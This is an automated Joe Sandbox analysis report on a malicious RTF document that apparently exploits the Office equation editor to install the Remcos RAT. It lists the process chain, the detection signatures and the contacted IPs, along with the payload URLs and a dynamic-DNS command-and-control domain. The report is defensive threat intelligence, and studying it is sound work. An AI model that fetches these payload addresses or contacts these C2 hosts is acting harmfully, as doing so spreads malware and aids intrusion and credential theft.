                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1434624 Sample: nU7Z8sPyvf.rtf Startdate: 01/05/2024 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for domain / URL 2->67 69 Found malware configuration 2->69 71 28 other signatures 2->71 10 WINWORD.EXE 336 13 2->10         started        12 wscript.exe 2->12         started        process3 process4 14 EQNEDT32.EXE 12 10->14         started        19 EQNEDT32.EXE 10->19         started        dnsIp5 59 107.172.31.6, 49165, 49169, 80 AS-COLOCROSSINGUS United States 14->59 43 C:\Users\...\coinfishingusagegirlsknow.vbs, Unknown 14->43 dropped 45 C:\Users\user\...\indexphppagenotfound[1].gif, Unknown 14->45 dropped 61 Office equation editor establishes network connection 14->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->63 21 wscript.exe 11 14->21         started        file6 signatures7 process8 dnsIp9 53 paste.ee 21->53 55 paste.ee 104.21.84.67, 443, 49166 CLOUDFLARENETUS United States 21->55 85 System process connects to network (likely due to code injection or exploit) 21->85 87 Suspicious powershell command line found 21->87 89 Wscript starts Powershell (via cmd or directly) 21->89 93 5 other signatures 21->93 25 powershell.exe 4 21->25         started        signatures10 91 Connects to a pastebin service (likely for C&C) 53->91 process11 signatures12 95 Suspicious powershell command line found 25->95 97 Suspicious execution chain found 25->97 28 powershell.exe 13 6 25->28         started        process13 dnsIp14 57 uploaddeimagens.com.br 172.67.215.45, 443, 49167, 49168 CLOUDFLARENETUS United States 28->57 99 Creates autostart registry keys with suspicious values (likely registry only malware) 28->99 101 Writes to foreign memory regions 28->101 103 Injects a PE file into a foreign processes 28->103 32 RegAsm.exe 3 13 28->32         started        37 cmd.exe 1 28->37         started        signatures15 process16 dnsIp17 47 sembe.duckdns.org 32->47 49 sembe.duckdns.org 194.187.251.115, 14645, 49170 M247GB United Kingdom 32->49 51 geoplugin.net 178.237.33.50, 49171, 80 ATOM86-ASATOM86NL Netherlands 32->51 39 C:\Users\user\AppData\Local\Temp\...\nots.dat, data 32->39 dropped 73 Contains functionality to bypass UAC (CMSTPLUA) 32->73 75 Detected Remcos RAT 32->75 77 Contains functionality to steal Chrome passwords or cookies 32->77 83 4 other signatures 32->83 41 C:\ProgramData\antre.vbs, ASCII 37->41 dropped 79 Command shell drops VBS files 37->79 file18 81 Uses dynamic DNS services 47->81 signatures19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nU7Z8sPyvf.rtf63%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                      nU7Z8sPyvf.rtf56%VirustotalBrowse
                      nU7Z8sPyvf.rtf100%AviraHEUR/Rtf.Malformed

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      sembe.duckdns.org12%VirustotalBrowse
                      geoplugin.net4%VirustotalBrowse
                      uploaddeimagens.com.br7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://geoplugin.net/json.gp100%URL Reputationphishing
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://geoplugin.net/json.gp/C100%URL Reputationphishing
                      https://contoso.com/0%URL Reputationsafe
                      http://go.microsoft.c0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.google.com;0%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br/images/004/0%Avira URL Cloudsafe
                      http://app01.system.com.br/RDWeb/Pages/login.aspxd0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gp(GZ&0%Avira URL Cloudsafe
                      sembe.duckdns.org100%Avira URL Cloudmalware
                      https://uploaddeimagens.com.br/images/000%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br0%Avira URL Cloudsafe
                      https://analytics.paste.ee;0%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br/images/003%VirustotalBrowse
                      https://uploaddeimagens.com.br/images/004/4%VirustotalBrowse
                      https://uploaddeimagens.com.br7%VirustotalBrowse
                      sembe.duckdns.org12%VirustotalBrowse
                      http://app01.system.com.br/RDWeb/Pages/login.aspxd0%VirustotalBrowse
                      https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?171388202914%VirustotalBrowse
                      https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?17138820290%Avira URL Cloudsafe
                      http://app01.system.com.br/RDWeb/Pages/login.aspx0%Avira URL Cloudsafe
                      http://app01.system.com.br/RDWeb/Pages/login.aspxL0%Avira URL Cloudsafe
                      https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                      http://107.172.31.6/28088/HHRM.txt0%Avira URL Cloudsafe
                      http://app01.system.com.br/RDWeb/Pages/login.aspx700%Avira URL Cloudsafe
                      http://app01.system.com.br/RDWeb/Pages/login.aspxL0%VirustotalBrowse
                      http://app01.system.com.br/RDWeb/Pages/login.aspx0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      sembe.duckdns.org
                      		194.187.251.115
                      		truetrueunknown
                      paste.ee
                      		104.21.84.67
                      		truefalse
                        		high
                        geoplugin.net
                        		178.237.33.50
                        		truefalseunknown
                        uploaddeimagens.com.br
                        		172.67.215.45
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://paste.ee/d/e1cCsfalse
                          		high
                          http://geoplugin.net/json.gptrue
                          • URL Reputation: phishing
                          		unknown
                          sembe.duckdns.orgtrue
                          • 12%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029true
                          • 14%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://107.172.31.6/28088/HHRM.txttrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/server1.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.entrust.net03wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://paste.ee/d/e1cCsGwscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com;wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://analytics.paste.eewscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://uploaddeimagens.com.br/images/004/powershell.exe, 0000000A.00000002.455161670.0000000004E41000.00000004.00000020.00020000.00000000.sdmptrue
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://app01.system.com.br/RDWeb/Pages/login.aspxdwscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://paste.ee/d/e1cCs5wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://geoplugin.net/json.gp(GZ&RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uploaddeimagens.com.br/images/00powershell.exe, 0000000A.00000002.455161670.0000000004E5D000.00000004.00000020.00020000.00000000.sdmptrue
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://geoplugin.net/json.gp/Cpowershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                      • URL Reputation: phishing
                                      		unknown
                                      https://uploaddeimagens.com.brpowershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmptrue
                                      • 7%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://paste.ee/wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://analytics.paste.ee;wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://go.microsoft.cpowershell.exe, 0000000A.00000002.446170067.000000000036A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://cdnjs.cloudflare.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://app01.system.com.br/RDWeb/Pages/login.aspx70wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdnjs.cloudflare.com;wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://app01.system.com.br/RDWeb/Pages/login.aspxLwscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.entrust.net0Dwscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.550401395.0000000002382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://secure.comodo.com/CPS0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://secure.gravatar.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://themes.googleusercontent.comwscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://app01.system.com.br/RDWeb/Pages/login.aspxwscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403573136.000000000041C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356753900.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A64000.00000004.00000020.00020000.00000000.sdmp, indexphppagenotfound[1].gif.2.dr, coinfishingusagegirlsknow.vbs.2.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.entrust.net/2048ca.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      107.172.31.6
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue
                                                      178.237.33.50
                                                      		geoplugin.netNetherlands
                                                      		8455ATOM86-ASATOM86NLfalse
                                                      104.21.84.67
                                                      		paste.eeUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      172.67.215.45
                                                      		uploaddeimagens.com.brUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      194.187.251.115
                                                      		sembe.duckdns.orgUnited Kingdom
                                                      		9009M247GBtrue

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1434624
                                                      Start date and time:2024-05-01 14:54:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:20
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:nU7Z8sPyvf.rtf
                                                      renamed because original name is a hash value
                                                      Original Sample Name:0aba1094e29ed6d65fa5a8b1ec8c2e57.rtf
                                                      Detection:MAL
                                                      Classification:mal100.spre.troj.spyw.expl.evad.winRTF@14/20@6/5
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 75
                                                      • Number of non-executed functions: 190
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .rtf
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Active ActiveX Object
                                                      • Scroll down
                                                      • Close Viewer

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      05:55:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbs
                                                      05:55:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbs
                                                      14:54:59API Interceptor245x Sleep call for process: EQNEDT32.EXE modified
                                                      14:55:03API Interceptor197x Sleep call for process: wscript.exe modified
                                                      14:55:24API Interceptor183x Sleep call for process: powershell.exe modified
                                                      14:55:45API Interceptor197588x Sleep call for process: RegAsm.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      107.172.31.6d0yCZvKLXd.rtfGet hashmaliciousUnknownBrowse
                                                      • 107.172.31.6/5010/imagefishermankissinggirl.gif
                                                      dc234TCLU9801307.xlsGet hashmaliciousUnknownBrowse
                                                      • 107.172.31.6/5010/imagefishermankissinggirl.gif
                                                      SecuriteInfo.com.Exploit.ShellCode.69.18039.5462.rtfGet hashmaliciousUnknownBrowse
                                                      • 107.172.31.6/9009/imagepixelsample.gif
                                                      dc_234TCLU9801307.xlsGet hashmaliciousUnknownBrowse
                                                      • 107.172.31.6/9009/imagepixelsample.gif
                                                      178.237.33.50Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Hapril-29-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      104.21.84.67Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • paste.ee/d/u4bvR
                                                      rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                      • paste.ee/d/SDfNF
                                                      Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/enGXm
                                                      Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/wXm0Y
                                                      SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/eA3FM
                                                      dereac.vbeGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/JZHbW
                                                      P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/kmRFs
                                                      comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • paste.ee/d/cJo7v
                                                      RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • paste.ee/d/EgkAG
                                                      87645345.vbsGet hashmaliciousXWormBrowse
                                                      • paste.ee/d/IJGyf

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      sembe.duckdns.org1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      Ziraat Bankas#U0131 Swift Mesaji2.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                      • 194.187.251.115
                                                      SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      TSTS 0005A.bat.exeGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      UNB-PIO88938MBANSOP.docx.docGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      SecuriteInfo.com.Exploit.ShellCode.69.22577.16704.rtfGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      240202PIMXF24C.docx.docGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      DHL-LHER0006981753.docx.docGet hashmaliciousRemcosBrowse
                                                      • 194.187.251.115
                                                      paste.eeQF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.84.67
                                                      citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 104.21.84.67
                                                      cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.187.200
                                                      CARTASCONF_PDF.vbsGet hashmaliciousUnknownBrowse
                                                      • 104.21.84.67
                                                      SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.187.200
                                                      SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtfGet hashmaliciousUnknownBrowse
                                                      • 172.67.187.200
                                                      d0yCZvKLXd.rtfGet hashmaliciousUnknownBrowse
                                                      • 104.21.84.67
                                                      dc234TCLU9801307.xlsGet hashmaliciousUnknownBrowse
                                                      • 172.67.187.200
                                                      New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 104.21.84.67
                                                      SecuriteInfo.com.Exploit.ShellCode.69.18039.5462.rtfGet hashmaliciousUnknownBrowse
                                                      • 172.67.187.200
                                                      uploaddeimagens.com.brQF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.45.138
                                                      citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 172.67.215.45
                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • 172.67.215.45
                                                      cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.45.138
                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • 172.67.215.45
                                                      CARTASCONF_PDF.vbsGet hashmaliciousUnknownBrowse
                                                      • 172.67.215.45
                                                      SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      prnportccy.vbsGet hashmaliciousFormBookBrowse
                                                      • 172.67.215.45
                                                      Demand Q2-2024.xlsxGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.138
                                                      New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 172.67.215.45
                                                      geoplugin.netTapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
